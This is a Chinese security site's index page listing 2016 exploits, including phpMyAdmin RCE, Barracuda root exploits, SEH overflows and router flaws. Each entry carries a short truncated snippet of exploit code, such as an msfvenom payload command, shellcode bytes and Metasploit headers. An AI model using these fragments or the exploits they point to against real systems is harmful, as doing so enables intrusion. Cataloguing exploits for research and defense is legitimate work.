首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
PhpMyAdmin 4.6.2 - Post-Auth Remote Code Execution
  日期:2016-08-09 15:28:21 点击:64 评论:0
#!/usr/bin/env python cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7. CVE: CVE-2016-5734 Author: https://twitter.com/i
WebKit - TypedArray.fill Memory Corruption
  日期:2016-08-09 15:26:57 点击:20 评论:0
!-- There is a bug in TypedArray.fill that can be used to write to an absolute pointer. In JavaScriptCore/runtime/JSGenericTypedArrayViewPrototypeFunctions.h, the function genericTypedArrayViewProtoFuncFill contains the following code: unsigned lengt
AppArmor securityfs < 4.8 - aa_fs_seq_hash_show Reference Count Leak
  日期:2016-08-09 15:19:46 点击:29 评论:0
/* There's a reference count leak in aa_fs_seq_hash_show that can be used to overflow the reference counter and trigger a kernel use-after-free static int aa_fs_seq_hash_show(struct seq_file *seq, void *v) { struct aa_replacedby *r = seq-private; str
Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)
  日期:2016-08-09 15:18:06 点击:155 评论:0
#!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 SEH Overflow with Egghunter # Date: July 29, 2016 # Exploit Author: ch3rn0byl # Vendor Homepage: http://www.sharing-file.com/ # Software Link: http://www.sharing-file.com/download.ph
Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONT
  日期:2016-08-09 15:02:09 点击:18 评论:0
?php # Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039) # https://www.drupal.org/node/2765575 # by Raz0r ( http://raz0r.name ) # # E-DB Note: Source ~ https://gist.github.com/Raz0r/7b7501cb53db70e7d60819f8eb9fcef5 $cmd = curl -XPOST ht
VUPlayer 2.49 - (.pls) Stack Buffer Overflow (DEP Bypass)
  日期:2016-07-29 13:55:13 点击:37 评论:0
#!/usr/bin/python import os,sys #Tested Windows 7 Home x86 Windows 10 Home x86_x64 #badchars x00x0ax1ax20x40 #msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b x00x0ax1ax20x40 -f python buf = buf += xbfx3bx99xddxa3xdb
Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (3)
  日期:2016-07-29 13:53:45 点击:30 评论:0
# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (3)# Date: 07/28/16# Exploit Author: xort xort@blacksecurity.org# Vendor Homepage: https://www.barracuda.com/# Software Link: https://www.barracuda.com/products/
Zortam Media Studio 20.60 Buffer Overflow
  日期:2016-07-29 13:52:34 点击:12 评论:0
Document Title:===============Zortam Media Studio 20.60 - Buffer Overflow VulnerabilityReferences (Source):====================http://www.vulnerability-lab.com/get_content.php?id=1884Release Date:=============2016-07-27Vulnerability Laboratory ID (V
VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0
  日期:2016-07-28 14:52:08 点击:17 评论:0
On most modern Linux systems, /bin/sh is provided by bash, which detects that it's being invoked as sh, and attempts to mimic traditional sh. As everyone who works in security quickly learns, bash will drop privileges very early if uid != euid. 488 4
AXIS Authenticated Remote Command Execution
  日期:2016-07-28 14:48:39 点击:30 评论:0
_ _ _ _ _ _ _ _ _ _ / / / / / / / / / / ( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 ) _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ www.orwelllabs.com security advisory olsa-2015-8257 PGP: 79A6CCC0* Advisory Information+++++++++++++++++++++
Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)
  日期:2016-07-28 14:47:56 点击:21 评论:0
## ## This module requires Metasploit: http://metasploit.com/download ## Current source: https://github.com/rapid7/metasploit-framework ### require 'msf/core' class MetasploitModule Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient Rank =
Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote
  日期:2016-07-27 13:50:41 点击:23 评论:0
# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2) # Date: 07/25/16 # Exploit Author: xort xort@blacksecurity.org # Vendor Homepage: https://www.barracuda.com/ # Software Link: https://www.barracuda.com/produc
Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities
  日期:2016-07-27 13:49:37 点击:34 评论:0
''' Bellini/Supercook Wi-Fi Yumi SC200 - Multiple vulnerabilities Reported By: ================================== James McLean - Primary: james dot mclean at gmail dot com Secondary: labs at juicedigital dot net Device Overview: =====================
Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities
  日期:2016-07-27 13:48:45 点击:37 评论:0
''' Technicolor TC7200 modem/router multiple vulnerabilities -------------------------------------------------------- Platforms / Firmware confirmed affected: - Technicolor TC7200, STD6.02.11 - Product page: http://www.technicolor.com/en/solutions-se
Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities
  日期:2016-07-27 13:46:19 点击:52 评论:0
''' Ubee EVW3226 modem/router multiple vulnerabilities -------------------------------------------------- Platforms / Firmware confirmed affected: - Ubee EVW3226, 1.0.20 - Product page: http://www.ubeeinteractive.com/products/cable/evw3226 Vulnerabil
PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write
  日期:2016-07-27 13:44:51 点击:48 评论:0
''' PHP 7.0.8, 5.6.23 and 5.5.37 does not perform adequate error handling in its `bzread()' function: php-7.0.8/ext/bz2/bz2.c ,---- | 364 static PHP_FUNCTION(bzread) | 365 { | ... | 382 ZSTR_LEN(data) = php_stream_read(stream, ZSTR_VAL(data), ZSTR_LE
CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter+ASLR bypass)
  日期:2016-07-27 13:42:49 点击:22 评论:0
# Exploit Title: [CoolPlayer+ Portable build 2.19.6 - .m3u Stack Overflow [Egghunter+ASLR bypass]] # Exploit Author: [Karn Ganeshen] # Download link: [https://sourceforge.net/projects/portableapps/files/CoolPlayer%2B%20Portable/CoolPlayerPlusPortable
Drupal CODER Module 2.5 - Remote Command Execution (Metasploit)
  日期:2016-07-27 13:42:10 点击:42 评论:0
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient incl
MediaCoder 0.8.43.5852 - .m3u SEH Exploit
  日期:2016-07-27 13:41:14 点击:39 评论:0
# Exploit Title: [MediaCoder 0.8.43.5852 - .m3u SEH Exploit] # Exploit Author: [Karn Ganeshen] # Vendor Homepage: [http://www.mediacoderhq.com] # Download link: [http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.45.5852.exe] # Version: [Cu
Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit
  日期:2016-07-27 13:40:33 点击:70 评论:0
# Exploit Title: Barracuda Spam Virus Firewall Post Auth Remote Root Exploit # Date: 07/21/16 # Exploit Author: xort xort@blacksecurity.org # Vendor Homepage: https://www.barracuda.com/ # Software Link: https://www.barracuda.com/landing/pages/spamfir
共637页/12733条记录 首页 上一页 [110] [111] [112] 113 [114] [115] [116] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved